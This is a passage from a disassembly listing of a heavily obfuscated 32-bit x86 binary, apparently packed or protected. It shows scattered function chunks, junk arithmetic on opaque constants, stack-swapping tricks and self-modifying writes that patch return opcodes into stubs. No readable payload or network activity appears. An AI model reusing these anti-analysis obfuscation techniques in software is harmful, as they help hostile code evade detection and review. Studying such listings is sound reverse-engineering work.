loc_44DF49:				; CODE XREF: sub_441E23:loc_443869j
		mov	eax, 80F02D07h
		push	ecx
		push	789BDFD3h
		pop	ecx
		jmp	loc_447389
; END OF FUNCTION CHUNK	FOR sub_441E23

; =============== S U B	R O U T	I N E =======================================



sub_44DF5A	proc near		; DATA XREF: sub_43F227+9DADo

; FUNCTION CHUNK AT 00440E3C SIZE 00000018 BYTES

		push	edx
		call	sub_454E54
		call	sub_44C267

loc_44DF65:				; CODE XREF: sub_439529+F2FAj
		jmp	loc_440E3C
sub_44DF5A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E1C

loc_44DF6A:				; CODE XREF: sub_451E1C+7A0Bj
		rol	edx, 1Bh
		or	edx, 0F8D3DA71h
		xor	edx, 18021A5h
		add	eax, edx
		pop	edx
		rol	eax, 2
		mov	ds:dword_45AAC4, eax
		jmp	loc_4590A5
; END OF FUNCTION CHUNK	FOR sub_451E1C

; =============== S U B	R O U T	I N E =======================================



sub_44DF8A	proc near		; DATA XREF: hvvrg7ie:00453901o

; FUNCTION CHUNK AT 0043C926 SIZE 00000005 BYTES

		inc	dword ptr [ebp-28h]
		mov	eax, [ebp-28h]
		mov	byte ptr [eax],	0
		inc	dword ptr [ebp-24h]
		jmp	loc_43C926
sub_44DF8A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_44DF9B:				; CODE XREF: sub_450246:loc_439353j
					; sub_43C048+7j ...
		pushf
		push	0A49DA55h
		pop	eax
		sub	eax, 5ADA7FEh
		or	eax, 6A490127h
		jmp	loc_4457FF
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AF30

loc_44DFB3:				; CODE XREF: sub_43AF30+Cj
		mov	edi, ebx
		pop	ebx
		or	edi, 0FB1BC898h
		and	edi, 0C2F99487h
		test	edi, 4000000h
		jmp	loc_45B18C
; END OF FUNCTION CHUNK	FOR sub_43AF30
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 12h
		mov	ds:dword_439C94, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_44DFD8:				; CODE XREF: sub_44616F+122F6j
		jmp	loc_44623B
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD49

loc_44DFDD:				; CODE XREF: sub_43CD49+7j
		jmp	loc_4571D2
; END OF FUNCTION CHUNK	FOR sub_43CD49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_44DFE2:				; CODE XREF: sub_453405-167C6j
					; sub_453405-D9B5j
		rol	eax, 12h
		push	eax
		call	sub_43E7F3
		jmp	nullsub_173
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------

loc_44DFF0:				; CODE XREF: hvvrg7ie:00445665j
		mov	ecx, [esp+10h]
		mov	dword ptr [ecx], 10001h
		jmp	loc_45300B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_44DFFF:				; CODE XREF: sub_43AB99+365Fj
		add	eax, 7D0h
		push	offset sub_43DE01
		jmp	loc_45AC0D
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453D0F

loc_44E00E:				; CODE XREF: sub_453D0F+1Cj
		jl	loc_439578
		xchg	edi, esi
		xor	eax, ecx
		jmp	loc_439578
; END OF FUNCTION CHUNK	FOR sub_453D0F
; ---------------------------------------------------------------------------

locret_44E01D:				; CODE XREF: hvvrg7ie:0044C016j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_44E01E:				; CODE XREF: sub_4408AE+12AADj
		jmp	loc_44960E
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_44E023:				; CODE XREF: sub_43E063+C0j
		or	edx, ebx
		pop	ebx
		cmp	ebx, ecx

loc_44E028:				; CODE XREF: sub_43ECAA:loc_4539B6j
		shr	ecx, 1Ch
		pop	ebx

loc_44E02C:				; CODE XREF: hvvrg7ie:0044AF83j
		jmp	loc_43F9F9
; END OF FUNCTION CHUNK	FOR sub_43E063

; =============== S U B	R O U T	I N E =======================================



sub_44E031	proc near		; DATA XREF: sub_450246-7901o

; FUNCTION CHUNK AT 0044C5E9 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		jmp	loc_44C5E9
sub_44E031	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3F1

loc_44E039:				; CODE XREF: sub_44B3F1+535j
		xor	edi, 7F934313h

loc_44E03F:				; CODE XREF: hvvrg7ie:loc_444ED3j
		xor	eax, edi
		pop	edi
		push	offset sub_458A57
		jmp	loc_44C062
; END OF FUNCTION CHUNK	FOR sub_44B3F1

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_44E04C	proc near		; CODE XREF: sub_456CD4:loc_452879j
		retn
sub_44E04C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44612F

loc_44E04D:				; CODE XREF: sub_44612F:loc_446145j
		pop	edx
		or	edx, 8BA031BEh
		and	edx, 9FCC6DF5h
		xor	edx, 0D4E88FE2h
		add	edx, ebp
		add	edx, 0B4DB15A6h
		mov	[edx], eax
		pop	edx
		jmp	loc_44FE34
; END OF FUNCTION CHUNK	FOR sub_44612F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450FF2

loc_44E070:				; CODE XREF: sub_450FF2+10j
		jz	loc_43C801
		jmp	loc_455D4E
; END OF FUNCTION CHUNK	FOR sub_450FF2
; ---------------------------------------------------------------------------

loc_44E07B:				; CODE XREF: hvvrg7ie:00458364j
		jnz	loc_45A790
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_44E081:				; CODE XREF: sub_450AA8-4EB8j
		jmp	loc_43A8F7
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
		sbb	edx, 7D427969h
		adc	ebx, 3BBC7301h
		jmp	loc_45A790
; ---------------------------------------------------------------------------
		push	edx
		pop	ecx
		jmp	sub_44C8AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_44E09E:				; CODE XREF: sub_444BE1+3465j
		not	ecx
		add	esi, eax
		or	ebx, 5F6A9AADh

loc_44E0A8:				; CODE XREF: sub_444BE1:loc_43ED73j
		call	sub_44DE0A
		jmp	loc_439CDD
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
		rol	esi, 3
		js	loc_450942
		jmp	sub_4395E7

; =============== S U B	R O U T	I N E =======================================



sub_44E0C0	proc near		; CODE XREF: hvvrg7ie:0045288Dp
					; hvvrg7ie:00457BCAj

; FUNCTION CHUNK AT 0043BA89 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F6A0 SIZE 0000000A BYTES

		xchg	edx, [esp+0]
		pop	edx
		call	sub_44DE0A
		mov	edx, 0A22F8A70h
		call	sub_445616
		jmp	loc_43BA89
sub_44E0C0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_44E0D8:				; CODE XREF: sub_43B3BE+1114Aj
		jz	loc_441EBF
		sbb	ebp, 52F04AC8h
		jmp	loc_43D8DD
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AFD7

loc_44E0E9:				; CODE XREF: sub_44AFD7+641Cj
		jnz	near ptr dword_43C2F4+0Fh
		jmp	loc_44DF2A
; END OF FUNCTION CHUNK	FOR sub_44AFD7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518BD

loc_44E0F4:				; CODE XREF: sub_4518BD:loc_440A1Aj
		jl	loc_44844F

loc_44E0FA:				; CODE XREF: sub_43C290+1CE1Dj
		jmp	nullsub_232
; END OF FUNCTION CHUNK	FOR sub_4518BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457269

loc_44E0FF:				; CODE XREF: sub_457269+7j
		jmp	nullsub_268
; END OF FUNCTION CHUNK	FOR sub_457269
; ---------------------------------------------------------------------------
		adc	edx, 45EAA51h

loc_44E10A:				; CODE XREF: hvvrg7ie:loc_452CC6j
		jmp	loc_44844D
; ---------------------------------------------------------------------------

loc_44E10F:				; CODE XREF: hvvrg7ie:00442A46j
		not	ebp
; START	OF FUNCTION CHUNK FOR sub_441AB2

loc_44E111:				; CODE XREF: sub_441AB2:loc_442A29j
		add	edx, 2455CD6Fh
		xchg	edx, [esp+0]
		jmp	loc_4479E5
; END OF FUNCTION CHUNK	FOR sub_441AB2
; ---------------------------------------------------------------------------

loc_44E11F:				; CODE XREF: hvvrg7ie:loc_43A971j
		cmp	eax, 400DDFF4h
		jmp	loc_43C8D0
; ---------------------------------------------------------------------------

locret_44E12A:				; CODE XREF: hvvrg7ie:00451FA8j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4495B9

loc_44E12B:				; CODE XREF: sub_4495B9:loc_43A448j
		jmp	loc_444BDA
; END OF FUNCTION CHUNK	FOR sub_4495B9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_256. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C267

loc_44E131:				; CODE XREF: sub_44C267+21j
		jmp	loc_4574BB
; END OF FUNCTION CHUNK	FOR sub_44C267
; ---------------------------------------------------------------------------

loc_44E136:				; CODE XREF: hvvrg7ie:00440CB8j
		jmp	loc_446AE7
; ---------------------------------------------------------------------------
		pop	edi
		jmp	loc_452F72

; =============== S U B	R O U T	I N E =======================================



sub_44E141	proc near		; CODE XREF: hvvrg7ie:0043DDCCj
					; hvvrg7ie:004468A6p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00452D91 SIZE 00000010 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, [esp-4+arg_0]
		push	edi
		mov	edi, edx
		xchg	edi, [esp+0]
		push	ecx
		push	0A45063Ah
		jmp	loc_452D91
sub_44E141	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44E159	proc near		; CODE XREF: hvvrg7ie:00449FD4j
					; sub_455087+7p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045A9B8 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	edx, [esp-4+arg_0]
		push	offset sub_446B6B
		jmp	loc_45A9B8
sub_44E159	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D671

loc_44E16A:				; CODE XREF: sub_44D671-8C2Bj
		xor	ebp, 8D287E81h
		push	3A50ACE4h
		sbb	ebp, esi

loc_44E177:				; CODE XREF: sub_44D671:loc_44B24Dj
		push	0D6A3F848h
		pop	eax
		or	eax, 0E4DD1F29h
		rol	eax, 16h
		jmp	loc_43BA12
; END OF FUNCTION CHUNK	FOR sub_44D671
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_44E18B:				; CODE XREF: sub_43B6A5+1AA41j
		jz	loc_44F7E2
		jmp	loc_4525F2
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------

loc_44E196:				; CODE XREF: hvvrg7ie:loc_43F541j
		shl	eax, 7
		mov	edx, [ebp+8]
		mov	edx, [edx-8]
		or	edx, 40h
		or	eax, edx
		jmp	loc_44D919
; ---------------------------------------------------------------------------

loc_44E1A9:				; CODE XREF: hvvrg7ie:loc_44B65Cj
		add	edx, 5DC343E8h
		mov	[edx], eax
		pop	edx
		lea	eax, nullsub_495
		mov	byte ptr [eax],	0C3h
		jmp	loc_43AD0E
; ---------------------------------------------------------------------------

loc_44E1C0:				; CODE XREF: hvvrg7ie:0043A94Dj
		mov	eax, [esp]
		jmp	loc_444CAD
; ---------------------------------------------------------------------------

loc_44E1C8:				; CODE XREF: hvvrg7ie:0044D126j
		pushf

; =============== S U B	R O U T	I N E =======================================



sub_44E1C9	proc near		; CODE XREF: hvvrg7ie:0043BDE1p

; FUNCTION CHUNK AT 0043CBD4 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043D746 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004429F9 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044744C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447DC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F381 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452052 SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		call	sub_44801A
		jmp	loc_447DC1
sub_44E1C9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	[edi], ebx
		jg	sub_444593
		jmp	sub_451BAD
; ---------------------------------------------------------------------------

loc_44E1E4:				; DATA XREF: hvvrg7ie:004431A1o
		mov	[ebx], eax
		push	offset sub_446FB6

loc_44E1EB:				; CODE XREF: hvvrg7ie:004420FFj
		jmp	loc_43C2EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A5F4

loc_44E1F0:				; CODE XREF: sub_45A5F4-16E02j
		pop	ebp
		push	offset sub_442F15
		jmp	loc_44D4C2
; END OF FUNCTION CHUNK	FOR sub_45A5F4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C290

loc_44E1FB:				; CODE XREF: sub_43C290:loc_45236Dj
		add	ecx, 0FECC1B0Ch
		shl	ebx, 1Bh
		xor	esi, 9818F9E0h
		add	edx, 0D41B5878h
		jmp	loc_441A49
; END OF FUNCTION CHUNK	FOR sub_43C290
; ---------------------------------------------------------------------------

loc_44E215:				; CODE XREF: hvvrg7ie:00455A16j
		add	edx, 0CBC399EAh
		mov	edx, [ebx]
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_44E21D:				; CODE XREF: sub_4569C6+1Aj
		add	edx, 0E5D04BD8h
		add	edx, ebp
		add	edx, 82492B4h
		jmp	loc_43D928
; END OF FUNCTION CHUNK	FOR sub_4569C6
; ---------------------------------------------------------------------------
		or	esi, edx
		sub	eax, 0ACD65E21h
		jmp	sub_44B595

; =============== S U B	R O U T	I N E =======================================



sub_44E23D	proc near		; CODE XREF: hvvrg7ie:00448ADBj
					; sub_449D38:loc_44FA53p

; FUNCTION CHUNK AT 0044E47F SIZE 00000010 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	edx, 7E219613h
		mov	edx, [edx]
		mov	ebx, [edx]
		jmp	loc_44E47F
sub_44E23D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_44E250:				; CODE XREF: sub_4554E8:loc_454C92j
					; sub_4554E8-842j
		add	edi, 8FAE2A37h
		add	eax, edi
		pop	edi
		mov	eax, [eax]
		test	dword ptr [eax], 0FFFF0000h
		jnz	loc_43983D
		jmp	loc_45A95E
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B9C

loc_44E26C:				; CODE XREF: sub_455B9C:loc_44C861j
		push	eax
		push	edi
		call	sub_44D98D

loc_44E273:				; CODE XREF: hvvrg7ie:0043DD90j
		add	esi, 96498376h
; END OF FUNCTION CHUNK	FOR sub_455B9C
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_44E279:				; CODE XREF: sub_444B29:loc_43DD7Aj
		and	eax, 9D1BB7Eh
		add	eax, 1283E5BAh
		add	eax, ebp
		add	eax, 0E3FB60EEh
		mov	eax, [eax]
		call	sub_44A994
		jmp	loc_43A30A
; END OF FUNCTION CHUNK	FOR sub_444B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3F1

loc_44E299:				; CODE XREF: sub_44B3F1:loc_458DC7j
		jge	loc_446B08
		sbb	edx, 2D1C61F7h
		mov	eax, ebp
		cdq
		jmp	loc_44B205
; END OF FUNCTION CHUNK	FOR sub_44B3F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4419C0

loc_44E2AD:				; CODE XREF: sub_4419C0:loc_43ADFFj
		jnz	loc_43934E
		and	edi, eax
		jmp	loc_43934C
; END OF FUNCTION CHUNK	FOR sub_4419C0
; ---------------------------------------------------------------------------

loc_44E2BA:				; CODE XREF: hvvrg7ie:loc_44D9B3j
		ja	loc_456A11
		sbb	edx, ebx
		jmp	loc_43C05D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_217. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B3FF

loc_44E2C8:				; CODE XREF: sub_45B3FF+12j
		jmp	loc_43DFFA
; END OF FUNCTION CHUNK	FOR sub_45B3FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450590

loc_44E2CD:				; CODE XREF: sub_450590+9134j
		jmp	loc_44CE45
; END OF FUNCTION CHUNK	FOR sub_450590

; =============== S U B	R O U T	I N E =======================================



sub_44E2D2	proc near		; DATA XREF: hvvrg7ie:0045525Bo

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044824C SIZE 0000000A BYTES

		jz	loc_44824C
		call	sub_43D140
sub_44E2D2	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44809F

loc_44E2DD:				; CODE XREF: sub_44809F-379Aj
		lea	eax, nullsub_18
		mov	byte ptr [eax],	0C3h
		jmp	loc_444750
; END OF FUNCTION CHUNK	FOR sub_44809F
; ---------------------------------------------------------------------------
		call	nullsub_503
		jmp	ds:dword_41D0C4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4405AA

loc_44E2F6:				; CODE XREF: sub_4405AA+41A0j
		jmp	loc_451320
; END OF FUNCTION CHUNK	FOR sub_4405AA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_503. PRESS KEYPAD	"+" TO EXPAND]
		dd 0FFEF1080h, 6FE95AFFh
		db 0FAh, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_44E307:				; CODE XREF: hvvrg7ie:00446EBDj
		add	edi, ebp
		popf
		adc	edx, ecx
		shl	eax, 2

loc_44E30F:				; CODE XREF: hvvrg7ie:loc_446EB6j
		or	edi, 70B495C2h
		rol	edi, 0Eh
		jmp	loc_43DD95
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_44E31D:				; CODE XREF: sub_442FD1+6D9Cj
		mov	ebx, [edx]

loc_44E31F:				; CODE XREF: sub_442FD1:loc_439676j
		mov	eax, 60h
		push	esi
		push	80E20A18h
		pop	esi
		jmp	loc_44C85C
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------

loc_44E330:				; DATA XREF: sub_444034:loc_444035o
		mov	ebp, esp
		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp]
		jmp	loc_450D15
; ---------------------------------------------------------------------------

loc_44E33D:				; CODE XREF: hvvrg7ie:loc_43DE74j
		mov	eax, [esp]
		call	sub_4395E7
; START	OF FUNCTION CHUNK FOR sub_447E56

loc_44E345:				; CODE XREF: sub_447E56+C7C2j
		jmp	nullsub_191
; END OF FUNCTION CHUNK	FOR sub_447E56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_44E34A:				; CODE XREF: sub_43AB99+14j
		jmp	loc_43D8C9
; END OF FUNCTION CHUNK	FOR sub_43AB99

; =============== S U B	R O U T	I N E =======================================



sub_44E34F	proc near		; CODE XREF: sub_454099-18EE1j
					; sub_451697-11F46p

; FUNCTION CHUNK AT 0043BC07 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C6AE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043D83D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FB9D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CA3C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044EE1E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454F0C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045540B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00457328 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A3AC SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	edx, ebp
		add	edx, 0CA6E8CC2h
		jmp	loc_43D83D
sub_44E34F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_44E360:				; CODE XREF: sub_4413A5:loc_44D713j
		sbb	ecx, 8FB7E97h
		sbb	ebp, esi
		mov	[eax], ebx
		jmp	loc_44A0A1
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------

loc_44E36F:				; CODE XREF: hvvrg7ie:0043C3FBj
		jge	loc_459091

loc_44E375:				; CODE XREF: hvvrg7ie:00459672j
		jmp	sub_44CB64
; ---------------------------------------------------------------------------

loc_44E37A:				; CODE XREF: hvvrg7ie:0044FD00j
		jmp	loc_459304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44E37F:				; CODE XREF: sub_450434-7524j
		jmp	loc_456838
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
		sbb	ebp, esi
		sub	esi, 6A7CE760h
		mov	edx, 74ABBF3Eh
		jmp	loc_459091
; ---------------------------------------------------------------------------
		jmp	ds:off_41D124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_44E39C:				; CODE XREF: sub_456F9F:loc_43B76Dj
					; sub_456F9F:loc_43C329j ...
		jo	loc_445765
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_450F97
		jmp	loc_44ACA6
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------

loc_44E3B1:				; CODE XREF: hvvrg7ie:0043C109j
		sub	ebp, edi

; =============== S U B	R O U T	I N E =======================================



sub_44E3B3	proc near		; CODE XREF: sub_44BFF5:loc_45758Ep

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043CB45 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043E384 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043EC39 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F289 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FBA8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440F32 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441864 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441DFD SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044324D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00443EBC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004448B8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004449F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004452B7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00445D71 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00446039 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00446116 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446B47 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044802C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448EEE SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00449AC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C640 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044C7E5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044CA06 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D43C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D6AE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044FE3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451889 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452EF1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454A04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454A6B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004559D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455FC5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004563C1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00457CD3 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00459A44 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045A686 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0045B90F SIZE 00000005 BYTES

		xchg	ecx, [esp-8+arg_4]
		pop	ecx
		jnz	loc_44D6AE
		call	sub_44D2F8

loc_44E3C2:				; DATA XREF: sub_45264D+6o
		mov	eax, [eax]
		movzx	eax, word ptr [eax]
		and	eax, 0FFFF7FFFh
		jmp	loc_451889
sub_44E3B3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44E3D1:				; CODE XREF: sub_45889B:loc_43B714j
		push	0F852F9BBh
		jmp	loc_44A2F8
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107D

loc_44E3DB:				; CODE XREF: sub_44107D+EF98j
		call	sub_445616
		mov	ds:dword_45A8A0, eax
		jmp	loc_455C9E
; ---------------------------------------------------------------------------

loc_44E3EA:				; CODE XREF: sub_44107D:loc_45B14Ej
		cmp	ds:dword_45A8A0, 0
		jnz	loc_44A0BF
		call	sub_4572D1
		mov	edx, 0E5254649h
		call	sub_445616
		mov	ds:dword_45A8A0, eax
		jmp	loc_455C9E
; END OF FUNCTION CHUNK	FOR sub_44107D

; =============== S U B	R O U T	I N E =======================================



sub_44E410	proc near		; CODE XREF: sub_43AB99:loc_44622Bp
					; sub_43D531+1321Fj ...
		xchg	ecx, [esp+0]
		pop	ecx
		pop	ecx
		pop	ebp
		retn
sub_44E410	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44E417	proc near		; CODE XREF: hvvrg7ie:loc_44565Ap
					; sub_4501A9-D69j
		push	offset sub_442B8D
		jmp	nullsub_400
sub_44E417	endp

; ---------------------------------------------------------------------------

loc_44E421:				; CODE XREF: hvvrg7ie:00455104j
		sbb	edi, 0D7E20BB8h
; START	OF FUNCTION CHUNK FOR sub_446297

loc_44E427:				; CODE XREF: sub_446297:loc_4550EDj
		add	eax, 0F52D80D3h
		push	offset loc_4456DC
		jmp	loc_439699
; END OF FUNCTION CHUNK	FOR sub_446297
; ---------------------------------------------------------------------------

loc_44E437:				; DATA XREF: sub_44CB64-8E4Do
		add	edx, 0BC531C56h
		mov	edx, [edx]

loc_44E43F:				; CODE XREF: hvvrg7ie:loc_44DA83j
		call	sub_4585A5
; START	OF FUNCTION CHUNK FOR sub_452265

loc_44E444:				; CODE XREF: sub_452265-B487j
		jmp	loc_457E1D
; END OF FUNCTION CHUNK	FOR sub_452265
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4435FA

loc_44E449:				; CODE XREF: sub_4435FA+Fj
		jmp	loc_4504D5
; END OF FUNCTION CHUNK	FOR sub_4435FA

; =============== S U B	R O U T	I N E =======================================



sub_44E44E	proc near		; CODE XREF: hvvrg7ie:00442AAEp
					; hvvrg7ie:0044B175j

; FUNCTION CHUNK AT 00443D26 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451022 SIZE 0000000A BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, [eax]
		neg	eax
		sbb	eax, eax
		jmp	loc_451022
sub_44E44E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44E45D:				; CODE XREF: hvvrg7ie:004510FDj
		add	ecx, 493F5057h

; =============== S U B	R O U T	I N E =======================================



sub_44E463	proc near		; CODE XREF: sub_44C308+6p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045A419 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	edx, [esp-4+arg_0]
		jmp	loc_45A419
sub_44E463	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_44E46F:				; CODE XREF: sub_43CD0B+4B93j
		mov	eax, [eax]
		popf
		mov	al, [eax]
		jno	loc_4469E6
		jmp	loc_44330D
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E23D

loc_44E47F:				; CODE XREF: sub_44E23D+Ej
		sub	ebx, eax
		call	sub_455BE2
		mov	ecx, [eax]
		not	edi
		jmp	sub_43EA21
; END OF FUNCTION CHUNK	FOR sub_44E23D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_389. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44E490:				; CODE XREF: hvvrg7ie:00457ACEj
		jmp	locret_44791D
; ---------------------------------------------------------------------------

loc_44E495:				; CODE XREF: hvvrg7ie:0044DA6Aj
		jnz	loc_43DF7C
		jmp	loc_444EF8

; =============== S U B	R O U T	I N E =======================================



sub_44E4A0	proc near		; CODE XREF: sub_456CD4-4460p
